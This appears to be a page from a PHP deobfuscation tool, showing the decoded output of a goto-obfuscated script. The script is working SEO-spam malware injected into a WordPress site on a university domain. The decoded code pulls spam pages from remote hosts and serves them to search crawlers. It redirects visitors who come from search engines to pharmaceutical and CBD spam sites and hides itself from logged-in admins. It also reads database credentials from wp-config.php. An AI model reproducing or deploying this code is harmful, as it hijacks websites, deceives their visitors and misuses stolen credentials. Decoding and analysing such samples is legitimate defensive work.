Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php error_reporting(0); goto Ra376; h7ZaK: $lQxUQ = strtolower($_SERVER["\x48\124\124\..

Decoded Output download

<?php 
error_reporting(0); 
goto Ra376; h7ZaK: $lQxUQ = strtolower($_SERVER["HTTP_REFERER"]); goto jaPtv; EygWM: function Au_6j() { goto d4Zxn; d4Zxn: @($cKDN6 = SmWLg("http://blngblngs.rocks/pressure-host.txt")); goto zIEfu; zIEfu: if (empty($cKDN6)) { goto OunC0; } goto mLh11; J2CpW: $DwP63 = smWlG("http://5.g00gleweb.com/pressure-host.txt"); goto XqVUg; mLh11: $DwP63 = $cKDN6 . "?refpage=" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]; goto k1_ux; XqVUg: gzJ3a: goto EzRhN; k1_ux: OunC0: goto K9dut; r7CHT: return $DwP63; goto j5KYs; EzRhN: if (!empty($DwP63)) { goto MzMyZ; } goto Publk; xZhnJ: MzMyZ: goto r7CHT; Publk: $DwP63 = "https://6.saleforyou.org/pressure-jump.php"; goto xZhnJ; K9dut: if (!empty($cKDN6)) { goto gzJ3a; } goto J2CpW; j5KYs: } goto F9aDJ; Zjmhd: $TFI3u = str_replace("http://" . fokxd() . "/", $XPbPI . "://" . $otSoO . FOkXd() . "/", $TFI3u); goto WE85a; pfmQ1: if (!CXRU_($lQxUQ)) { goto yo3wF; } goto C8Ctw; ANw_h: function wJnsz() { goto LMYlO; CKnRt: w5lv8: goto HH7kC; Mi5_K: goto w5lv8; goto pjLpj; HH7kC: return $VMrXV; goto rU8Z7; pjLpj: GHFDx: goto MbBFJ; f1vSG: jBcC2: goto mdjDJ; N33Tn: $VMrXV = getenv("REMOTE_ADDR"); goto kdAU2; mdjDJ: $VMrXV = getenv("HTTP_X_FORWARDED_FOR"); goto Z0ECh; LMYlO: $VMrXV = ''; goto aQfvd; C7po8: if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) { goto jBcC2; } goto lLRtu; Z0ECh: goto w5lv8; goto pN0VQ; pN0VQ: P7lSA: goto N33Tn; aQfvd: if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) { goto GHFDx; } goto C7po8; kdAU2: goto w5lv8; goto qXwTX; wmUEn: if (isset($_SERVER["REMOTE_ADDR"]) && $_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) { goto SQqLc; } goto Mi5_K; lLRtu: if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) { goto P7lSA; } goto wmUEn; BJITB: goto w5lv8; goto f1vSG; MbBFJ: $VMrXV = getenv("HTTP_CLIENT_IP"); goto BJITB; qXwTX: SQqLc: goto hSd03; hSd03: $VMrXV = $_SERVER["REMOTE_ADDR"]; goto CKnRt; rU8Z7: } goto FJdsm; mJFn6: vY6ah: goto rM3jt; zyo4V: $TFI3u = smWlG(base64_decode("aHR0cDovL2ZhdC5ibG5nYmxuZ3Mucm9ja3MvMjAyMy0wMy9jYmQvbWFpbi5waHA/a2V5PQ") . $K_oX0 . "&host=" . $y_T1R . "&www=2"); goto xDQJc; xM4Rc: yo3wF: goto Antpn; FJdsm: $nimE7 = WjNSZ(); goto ob7IY; HECNB: Y6On2: goto u2t5G; kAR0z: $P9M3f = 1; goto GzHHg; Z1pi3: $TFI3u = str_replace("http://", "https://", $TFI3u); goto Mw7yC; xYgsP: header("location: " . $uqoJy); goto JO3vi; JTG96: C0TcM: goto TO0dC; Nll0Z: header("location: " . $uqoJy); goto BPtT1; ob7IY: function aaYkX($Eh3_p) { goto U_KUZ; yo3MT: if (!($pVMHa = mysqli_fetch_array($k_tbr))) { goto wvjCs; } goto Ug02Y; XQXhe: $N93qL = $UbPy1[2][3]; goto Q9i3Z; lO4N0: $E7YcR = ''; goto MGaMD; RM0hx: $HnmsA = $UbPy1[2][0]; goto vXwgU; kWOoP: $vUPrC = true; goto Bw21M; uu9p8: EKXzq: goto YbpUm; Ug02Y: $t_iIG .= $pVMHa["meta_value"]; goto AEn8d; KVCSK: Hd32t: goto yo3MT; MGaMD: $ApU8p = strripos($Eh3_p, "."); goto x9xuO; xZybD: preg_match_all("~^define.*(DB_NAME|DB_USER|DB_PASSWORD|DB_HOST)[\'"],\s+[\'"](.+)[\'"]\s*\);~m", $aTjvA, $UbPy1); goto ZvPlF; h9caH: mysqli_close($A1ON9); goto lO4N0; zdYOo: if (!file_exists($xbtit = "D:\sites\ifl/wp-config.php")) { goto cOnxk; } goto qeAe0; iIQtN: return $vUPrC; goto HKh7E; vXwgU: $vCowJ = $UbPy1[2][1]; goto dFv8S; HKh7E: ZkwqC: goto WXBTW; x9xuO: $A6FQ5 = substr($Eh3_p, 0, $ApU8p); goto bZOuW; qDXzw: $hGbbA = "SELECT * FROM `{$uqH5S}usermeta` WHERE `meta_key` = 'community-events-location'"; goto D3NLN; Q9i3Z: $uqH5S = $Y8N9k[1]; goto Uru70; D3NLN: $k_tbr = mysqli_query($A1ON9, $hGbbA); goto KVCSK; YbpUm: goto ZkwqC; goto yTLlK; wfbe4: $t_iIG = ''; goto tfs4M; AEn8d: goto Hd32t; goto IQYoJ; qeAe0: $aTjvA = file_get_contents($xbtit); goto xZybD; ZvPlF: preg_match("~table_prefix\s+=\s+'(.+)';~", $aTjvA, $Y8N9k); goto RM0hx; Bw21M: qDHQ4: goto uu9p8; yTLlK: cOnxk: goto iIQtN; U_KUZ: $vUPrC = false; goto zdYOo; Uru70: $A1ON9 = mysqli_connect($N93qL, $vCowJ, $ZPolf, $HnmsA); goto wfbe4; WXBTW: return $vUPrC; goto PLq1L; IQYoJ: wvjCs: goto h9caH; tfs4M: if (isset($WlVSt)) { goto EKXzq; } goto qDXzw; bZOuW: if (!(strpos($t_iIG, $A6FQ5) !== false || strpos($E7YcR, $A6FQ5) !== false)) { goto qDHQ4; } goto kWOoP; dFv8S: $ZPolf = $UbPy1[2][2]; goto XQXhe; PLq1L: } goto ZNFb4; kV4fB: $TFI3u = str_replace("_unLine_", "/", $TFI3u); goto rSNbO; rM3jt: u6G10: goto rcDge; jUBZn: $TFI3u = str_replace("http://fat.blngblngs.rocks/images202303/{$wCQ7U}/", $XPbPI . "://" . $otSoO . FOkXd() . "/images/", $TFI3u); goto BQC4I; EHlNc: echo $TFI3u; goto opUS6; q4JxE: i1gLF: goto OoJy2; VIG44: $TFI3u = str_replace("http://", "https://", $TFI3u); goto U3esw; ZQ55Z: $TFI3u = str_replace("/?key=", "/", $TFI3u); goto pqog6; sy2k_: $K_oX0 = str_replace($SlDPZ[1] . "/", $SlDPZ[1] . "_unLine_", $_SERVER["REQUEST_URI"]); goto B2e2_; bnZ1a: $TFI3u = SmWlG(base64_decode("aHR0cDovL2ZhdC5ibG5nYmxuZ3Mucm9ja3MvMjAyMy0wMy9wcmVzc3VyZS9tYWluLnBocD9rZXk9") . $K_oX0 . "&host=" . $y_T1R . "&www=2"); goto CIGF6; RQpea: $TFI3u = str_replace("http://fat.blngblngs.rocks/images202303/{$wCQ7U}/", $XPbPI . "://" . $otSoO . foKxD() . "/images/", $TFI3u); goto EpAmu; Ef4jl: exit; goto xM4Rc; xuk65: $K_oX0 = str_replace("/", '', $K_oX0); goto qNkMo; LQKU9: $K_oX0 = str_replace($SlDPZ[1] . "/", $SlDPZ[1] . "_unLine_", $_SERVER["REQUEST_URI"]); goto xuk65; KwKGq: $j5TBg = array("#Ask\s*Jeeves#i", "#HP\s*Web\s*PrintSmart#i", "#HTTrack#i", "#IDBot#i", "#Indy\s*Library#", "#ListChecker#i", "#MSIECrawler#i", "#NetCache#i", "#Nutch#i", "#RPT-HTTPClient#i", "#rulinki\.ru#i", "#Twiceler#i", "#WebAlta#i", "#Webster\s*Pro#i", "#www\.cys\.ru#i", "#Wysigot#i", "#Yahoo!\s*Slurp#i", "#Yeti#i", "#Accoona#i", "#CazoodleBot#i", "#CFNetwork#i", "#ConveraCrawler#i", "#DISCo#i", "#Download\s*Master#i", "#FAST\s*MetaWeb\s*Crawler#i", "#Flexum\s*spider#i", "#Gigabot#i", "#HTMLParser#i", "#ia_archiver#i", "#ichiro#i", "#IRLbot#i", "#Java#i", "#km\.ru\s*bot#i", "#kmSearchBot#i", "#libwww-perl#i", "#Lupa\.ru#i", "#LWP::Simple#i", "#lwp-trivial#i", "#Missigua#i", "#MJ12bot#i", "#msnbot#i", "#msnbot-media#i", "#Offline\s*Explorer#i", "#OmniExplorer_Bot#i", "#PEAR#i", "#psbot#i", "#Python#i", "#rulinki\.ru#i", "#SMILE#i", "#Speedy#i", "#Teleport\s*Pro#i", "#TurtleScanner#i", "#User-Agent#i", "#voyager#i", "#Webalta#i", "#WebCopier#i", "#WebData#i", "#WebZIP#i", "#Wget#i", "#Yandex#i", "#Yanga#i", "#Yeti#i", "#msnbot#i", "#spider#i", "#yahoo#i", "#jeeves#i", "#google#i", "#altavista#i", "#scooter#i", "#av\s*fetch#i", "#asterias#i", "#spiderthread revision#i", "#sqworm#i", "#ask#i", "#lycos.spider#i", "#infoseek sidewinder#i", "#ultraseek#i", "#polybot#i", "#webcrawler#i", "#robozill#i", "#gulliver#i", "#architextspider#i", "#yahoo!\s*slurp#i", "#charlotte#i", "#ngb#i", "#BingBot#i"); goto Z7IFc; dZxGN: if (!CXRu_($lQxUQ)) { goto PFHDx; } goto FbqYE; YKmxi: $K_oX0 = str_replace("/", '', $K_oX0); goto bnZ1a; GG_JR: TE2UC: goto FsoY1; nl1MU: if (!(FALSE !== strpos(gethostbyaddr($nimE7), "google"))) { goto bZAWo; } goto kAR0z; xDQJc: $TFI3u = str_replace("http://" . FOkxd() . "/", $XPbPI . "://" . $otSoO . FOkxD() . "/", $TFI3u); goto jUBZn; aN1yy: function smWlg($zMfQt) { goto VFm2h; UxiXE: McmzY: goto zxbWm; ZeB1h: $JMOEa = 5; goto zJcIQ; pSh0k: $cti5j = curl_init(); goto ZeB1h; zJcIQ: curl_setopt($cti5j, CURLOPT_URL, $zMfQt); goto sJJiC; wL2o9: curl_setopt($cti5j, CURLOPT_CONNECTTIMEOUT, $JMOEa); goto eXa6R; VFm2h: $uxscH = array("http" => array("method" => "GET", "timeout" => 5)); goto ADVFC; sJJiC: curl_setopt($cti5j, CURLOPT_RETURNTRANSFER, 1); goto wL2o9; eXa6R: $DwP63 = curl_exec($cti5j); goto T8c7m; zxbWm: return $DwP63; goto H90hK; T8c7m: curl_close($cti5j); goto UxiXE; mAooG: @($DwP63 = file_get_contents($zMfQt, false, $nzWki)); goto dtrcE; dtrcE: if (!empty($DwP63)) { goto McmzY; } goto pSh0k; ADVFC: $nzWki = stream_context_create($uxscH); goto mAooG; H90hK: } goto ANw_h; vF0ii: exit; goto lM21p; Pf90J: $wCQ7U = str_replace(".", "-", $wCQ7U); goto YTYng; JO3vi: exit; goto mJFn6; t_AVy: if (!(!preg_match("/wordpress_logged_in_/i", $nPaTf) && !$oqA0Z && !$P9M3f)) { goto mK3s2; } goto pfmQ1; mVWiM: if (!$P9M3f) { goto cc_HP; } goto EHlNc; gqVCJ: foreach ($_COOKIE as $vFpVR => $lDdla) { $nPaTf .= $vFpVR . "=" . $lDdla . ","; loCjt: } goto L1zKz; CxyOY: function t5bRS() { goto TUWWN; hwNCp: VK8kM: goto ynkqf; i3oY0: $DwP63 = $cKDN6 . "?refpage=" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]; goto AjNfh; IEAsJ: if (empty($cKDN6)) { goto Jbz0e; } goto i3oY0; TUWWN: @($cKDN6 = SMwlG("http://blngblngs.rocks/weight-host.txt")); goto IEAsJ; j7Wp6: if (!empty($DwP63)) { goto VK8kM; } goto r_axk; tutmO: qoEay: goto j7Wp6; r_axk: $DwP63 = "https://6.saleforyou.org/weight-ss.php"; goto hwNCp; AjNfh: Jbz0e: goto yM6zT; dK7ww: $DwP63 = SMWlG("http://5.g00gleweb.com/weight-host.txt"); goto tutmO; yM6zT: if (!empty($cKDN6)) { goto qoEay; } goto dK7ww; ynkqf: return $DwP63; goto nXDz0; nXDz0: } goto t_AVy; MCeFh: $uqoJy = kTwc6(); goto h4opw; MfV6y: echo $TFI3u; goto gti67; a26dj: echo $TFI3u; goto sT2Ln; jaPtv: $nPaTf = ''; goto gqVCJ; f3XZA: function cxRU_($OJOZ4) { goto XemJC; XemJC: $OixmG = str_replace("x", '', "bxxixnxgx|xaxoxxlx|axsxxk|xgxoxxoxgxlxe|yxxaxhxoxo|sxexxaxrxcxh|duxckdxucxkxgo"); goto dliId; OFGxh: return true; goto T5DqM; fPB0L: return false; goto nf5Ah; dliId: if (preg_match("/{$OixmG}/i", $OJOZ4)) { goto I7EYB; } goto fPB0L; T5DqM: kn7Dk: goto m8VvH; nf5Ah: goto kn7Dk; goto pgehq; pgehq: I7EYB: goto OFGxh; m8VvH: } goto h7ZaK; VYpSZ: boBi4: goto nbFb8; APWMk: $TFI3u = str_replace("http://fat.blngblngs.rocks/images202303/{$wCQ7U}/", $XPbPI . "://" . $otSoO . FOkxd() . "/images/", $TFI3u); goto Y4wGr; rcDge: $K_oX0 = str_replace($SlDPZ[1] . "/", $SlDPZ[1] . "_unLine_", $_SERVER["REQUEST_URI"]); goto Z2Mtk; FbqYE: $uqoJy = DRLqg(); goto Nll0Z; OoJy2: PsOGE: goto ywjhA; Z7IFc: if (!(!empty($_SERVER["HTTP_USER_AGENT"]) && FALSE !== strpos(preg_replace($j5TBg, "-NO-WAY-", $_SERVER["HTTP_USER_AGENT"]), "-NO-WAY-"))) { goto iDbA5; } goto y_goD; n58qS: $TFI3u = str_replace("http://", "https://", $TFI3u); goto W9PFA; WubxS: switch ($vmGaY) { case 1: goto QgO8t; yPy0k: goto PsOGE; goto O_7Z9; jnOX5: imagegif($TA5FW); goto yPy0k; QgO8t: header("content-type:image/gif"); goto jnOX5; O_7Z9: case 2: goto abCD1; vFr2n: imagejpeg($TA5FW); goto qPmX1; qPmX1: goto PsOGE; goto LZvmV; abCD1: header("content-type:image/jpeg"); goto vFr2n; LZvmV: case 3: goto lXACW; AjprO: goto PsOGE; goto Sb8zy; lXACW: header("content-type:image/png"); goto uvAsM; uvAsM: imagepng($TA5FW); goto AjprO; Sb8zy: default: goto PsOGE; } goto q4JxE; v5K4w: $XPbPI = "https"; goto aN1yy; lCkn7: $wCQ7U = preg_replace("/[^a-zA-Z|0-9|-|.]/i", "-", basename($wCQ7U)); goto Pf90J; j2iRd: DjwJg: goto JTG96; y6zKW: $otSoO = ''; goto v5K4w; s3bHX: $uqoJy = aU_6j(); goto nFiCS; Antpn: mK3s2: goto sy2k_; sxpys: $TA5FW = imagecreatefromstring(SmwlG($zMfQt)); goto pjwOD; eOw2N: function ktwc6() { goto Kq0_B; qqnHn: $DwP63 = sMwLg("http://5.g00gleweb.com/sugar-host.txt"); goto aAb3s; KKI2Y: wM3Uz: goto UIpe5; AKaMe: SxvXj: goto jjQU3; PtaTL: if (!empty($DwP63)) { goto SxvXj; } goto lG9bp; twKi1: if (empty($cKDN6)) { goto wM3Uz; } goto pDC_G; jjQU3: return $DwP63; goto BHMDJ; aAb3s: R3Blz: goto PtaTL; Kq0_B: @($cKDN6 = sMWlG("http://blngblngs.rocks/sugar-host.txt")); goto twKi1; pDC_G: $DwP63 = $cKDN6 . "?refpage=" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]; goto KKI2Y; UIpe5: if (!empty($cKDN6)) { goto R3Blz; } goto qqnHn; lG9bp: $DwP63 = "https://6.saleforyou.org/sugar-jump.php"; goto AKaMe; BHMDJ: } goto YzQ3m; RPF84: PFHDx: goto M3h9C; WE85a: $TFI3u = str_replace("http://fat.blngblngs.rocks/images202303/{$wCQ7U}/", $XPbPI . "://" . $otSoO . foKxD() . "/images/", $TFI3u); goto K2CFI; N0fNZ: exit; goto VYpSZ; FXiU2: if (!CxRu_($lQxUQ)) { goto lNLuu; } goto MCeFh; YTYng: if (!preg_match("/images\/(.*)/i", $_SERVER["REQUEST_URI"], $SlDPZ)) { goto drghR; } goto ORiQA; GTDof: $TFI3u = str_replace("http://fat.blngblngs.rocks/images202303/{$wCQ7U}/", $XPbPI . "://" . $otSoO . FoKxD() . "/images/", $TFI3u); goto UuhpN; oHykO: $TFI3u = str_replace("_unLine_", "/", $TFI3u); goto Z1pi3; RqkJV: if (!preg_match("#^\/(\w{5,6}\-\w{5,6})\/((.*?)\-(.*?)\-(.*))#i", $_SERVER["REQUEST_URI"], $SlDPZ)) { goto w67ST; } goto EygWM; TO0dC: if (!preg_match("#^\/(\w{3,4}\-\w{5,6})\/((.*?)\-(.*?)\-(.*))#i", $_SERVER["REQUEST_URI"], $SlDPZ)) { goto KLa7E; } goto CxyOY; sT2Ln: exit; goto Z35VT; PPIbi: header("location: " . $uqoJy); goto Ef4jl; NDHaE: $K_oX0 = str_replace($SlDPZ[1] . "/", $SlDPZ[1] . "_unLine_", $_SERVER["REQUEST_URI"]); goto YKmxi; diipT: function drLQg() { goto zEC7s; Ue6in: return $DwP63; goto jNmhj; cfqym: if (empty($cKDN6)) { goto UlLDX; } goto pijkW; pijkW: $DwP63 = $cKDN6 . "?refpage=" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]; goto zQ2QT; DM6eL: if (!empty($DwP63)) { goto Edmy2; } goto aLwIL; bqXQn: Edmy2: goto Ue6in; zEC7s: @($cKDN6 = SMwlg("http://blngblngs.rocks/cbd-host.txt")); goto cfqym; aLwIL: $DwP63 = "https://6.saleforyou.org/cbd-jump.php"; goto bqXQn; G4Gut: if (!empty($cKDN6)) { goto fNDmx; } goto WIx3G; IsKGi: fNDmx: goto DM6eL; WIx3G: $DwP63 = sMWlg("http://5.g00gleweb.com/cbd-host.txt"); goto IsKGi; zQ2QT: UlLDX: goto G4Gut; jNmhj: } goto U5o4j; CHbda: cc_HP: goto HECNB; YbUKE: KLa7E: goto sQmjB; ORiQA: $b1MN4 = $SlDPZ[1]; goto MIWZa; L1zKz: OQtPJ: goto WZa3_; J928A: iDbA5: goto nl1MU; bmHNp: $TFI3u = str_replace("_unLine_", "/", $TFI3u); goto VIG44; e91at: echo $TFI3u; goto U4GTR; zFlt0: gkXYu: goto LQKU9; fQe_k: $TFI3u = str_replace("http://", "https://", $TFI3u); goto mVWiM; MIWZa: $zMfQt = "http://fat.blngblngs.rocks/images202303/{$wCQ7U}/{$b1MN4}"; goto sxpys; bQSkL: if (!$P9M3f) { goto A21o8; } goto a26dj; F9aDJ: if (!(!preg_match("/wordpress_logged_in_/i", $nPaTf) && !$oqA0Z && !$P9M3f)) { goto Kp_Je; } goto v1jtk; pStfO: $TFI3u = str_replace("http://" . FOkxD() . "/", $XPbPI . "://" . $otSoO . FOkXD() . "/", $TFI3u); goto APWMk; M3h9C: G7gOI: goto KF98J; y_goD: $P9M3f = 1; goto J928A; GzHHg: bZAWo: goto f3XZA; rSNbO: $TFI3u = str_replace("http://", "https://", $TFI3u); goto bQSkL; CIGF6: $TFI3u = str_replace("http://" . fOkxd() . "/", $XPbPI . "://" . $otSoO . fokxd() . "/", $TFI3u); goto RQpea; W9PFA: if (!$P9M3f) { goto dHISQ; } goto ypMxP; Z35VT: A21o8: goto LXMHr; B2e2_: $K_oX0 = str_replace("/", '', $K_oX0); goto B9i1V; U3esw: if (!$P9M3f) { goto DjwJg; } goto MfV6y; ZNFb4: $oqA0Z = aAYKx($nimE7); goto KwKGq; tFwFS: if (!(!preg_match("/wordpress_logged_in_/i", $nPaTf) && !$oqA0Z && !$P9M3f)) { goto u6G10; } goto xPHKB; gti67: exit; goto j2iRd; Wkuo9: function LQBRQ() { goto uIplN; fah_W: if (!empty($cKDN6)) { goto Ira0o; } goto d0HFz; xKZ7K: FLLs4: goto fah_W; d_vEj: $DwP63 = "https://6.saleforyou.org/male-stone.php"; goto MgSpy; MgSpy: EfPkB: goto iegiB; yYoFP: $DwP63 = $cKDN6 . "?refpage=" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]; goto xKZ7K; RsDNf: Ira0o: goto rjh1H; rjh1H: if (!empty($DwP63)) { goto EfPkB; } goto d_vEj; ZuTN7: if (empty($cKDN6)) { goto FLLs4; } goto yYoFP; iegiB: return $DwP63; goto f1hPc; uIplN: @($cKDN6 = sMwlg("http://blngblngs.rocks/male-stone.txt")); goto ZuTN7; d0HFz: $DwP63 = smwLG("http://5.g00gleweb.com/male-host.txt"); goto RsDNf; f1hPc: } goto tFwFS; ywjhA: drghR: goto PNea4; nFiCS: header("location: " . $uqoJy); goto N0fNZ; RjkEu: $TFI3u = str_replace("/?key=", "/", $TFI3u); goto bmHNp; FsoY1: w67ST: goto nKtA_; BPtT1: exit; goto RPF84; U4GTR: exit; goto GG_JR; PoAri: dHISQ: goto YbUKE; v1jtk: if (!Cxru_($lQxUQ)) { goto boBi4; } goto s3bHX; Y1j6Z: $TFI3u = Smwlg(base64_decode("aHR0cDovL2ZhdC5ibG5nYmxuZ3Mucm9ja3MvMjAyMy0wMy9tYWxlL21haW4ucGhwP2tleT0") . $K_oX0 . "&host=" . $y_T1R . "&www=2"); goto Zjmhd; BQC4I: $TFI3u = str_replace(".html", '', $TFI3u); goto K_WRB; h4opw: header("location: " . $uqoJy); goto vF0ii; K_WRB: $TFI3u = str_replace("/?key=", "/", $TFI3u); goto kV4fB; Js5EA: $TFI3u = str_replace("_unLine_", "/", $TFI3u); goto fQe_k; ypMxP: echo $TFI3u; goto rdPIO; UuhpN: $TFI3u = str_replace(".html", '', $TFI3u); goto ZQ55Z; U5o4j: if (!(!preg_match("/wordpress_logged_in_/i", $nPaTf) && !$oqA0Z && !$P9M3f)) { goto G7gOI; } goto dZxGN; pqog6: $TFI3u = str_replace("_unLine_", "/", $TFI3u); goto n58qS; EpAmu: $TFI3u = str_replace(".html", '', $TFI3u); goto r22lS; lM21p: lNLuu: goto zFlt0; Dv0Pn: $TFI3u = str_replace("/?key=", "/", $TFI3u); goto Js5EA; pjwOD: list($Aw0l2, $p243Z, $vmGaY) = getimagesize($zMfQt); goto WubxS; IJGUi: $TFI3u = str_replace("http://" . Fokxd() . "/", $XPbPI . "://" . $otSoO . FOKXD() . "/", $TFI3u); goto GTDof; C8Ctw: $uqoJy = t5BRs(); goto PPIbi; yGks_: $uqoJy = LQBRq(); goto xYgsP; rdPIO: exit; goto PoAri; YzQ3m: if (!(!preg_match("/wordpress_logged_in_/i", $nPaTf) && !$oqA0Z && !$P9M3f)) { goto gkXYu; } goto FXiU2; LXMHr: Ga15X: goto RqkJV; opUS6: exit; goto CHbda; ojHMb: $K_oX0 = str_replace("/", '', $K_oX0); goto zyo4V; qNkMo: $TFI3u = SMwLg(base64_decode("aHR0cDovL2ZhdC5ibG5nYmxuZ3Mucm9ja3MvMjAyMy0wMy9zdWdhci9tYWluLnBocD9rZXk9") . $K_oX0 . "&host=" . $y_T1R . "&www=2"); goto pStfO; Mw7yC: if (!$P9M3f) { goto TE2UC; } goto e91at; PNea4: if (!preg_match("#^\/(\w{3,4}\-\w{3,4})\/((.*?)\-(.*?)\-(.*))#i", $_SERVER["REQUEST_URI"], $SlDPZ)) { goto C0TcM; } goto Wkuo9; nbFb8: Kp_Je: goto NDHaE; sQmjB: if (!preg_match("#^\/(\w{5,6}\-\w{3,4})\/((.*?)\-(.*?)\-(.*))#i", $_SERVER["REQUEST_URI"], $SlDPZ)) { goto Ga15X; } goto diipT; xPHKB: if (!CXRU_($lQxUQ)) { goto vY6ah; } goto yGks_; Y4wGr: $TFI3u = str_replace(".html", '', $TFI3u); goto Dv0Pn; WZa3_: $y_T1R = foKXd(); goto a1rAc; a1rAc: $wCQ7U = str_replace("www.", '', $y_T1R); goto lCkn7; Ra376: function fOKXd() { return "ifl.pitt.edu"; } goto y6zKW; Z2Mtk: $K_oX0 = str_replace("/", '', $K_oX0); goto Y1j6Z; nKtA_: if (!preg_match("#^\/(\w{3,4}\-\w{7,8})\/((.*?)\-(.*?)\-(.*))#i", $_SERVER["REQUEST_URI"], $SlDPZ)) { goto Y6On2; } goto eOw2N; KF98J: $K_oX0 = str_replace($SlDPZ[1] . "/", $SlDPZ[1] . "_unLine_", $_SERVER["REQUEST_URI"]); goto ojHMb; r22lS: $TFI3u = str_replace("/?key=", "/", $TFI3u); goto oHykO; B9i1V: $TFI3u = SMWlG(base64_decode("aHR0cDovL2ZhdC5ibG5nYmxuZ3Mucm9ja3MvMjAyMy0wMy93ZWlnaHQvbWFpbi5waHA/a2V5PQ") . $K_oX0 . "&host=" . $y_T1R . "&www=2"); goto IJGUi; K2CFI: $TFI3u = str_replace(".html", '', $TFI3u); goto RjkEu; u2t5G: setcookie("wordpress_logged_in_02a09ee18e2", "wordpress_logged_in_02a09ee18e2", time() + 3600 * 24 * 100); ?>

Did this file decode correctly?

Original Code

<?php
error_reporting(0);


Function Calls

None

Variables

None

Stats

MD5 fc2858fb34cf9594c9e3e4e1a5e9ca36
Eval Count 0
Decode Time 60 ms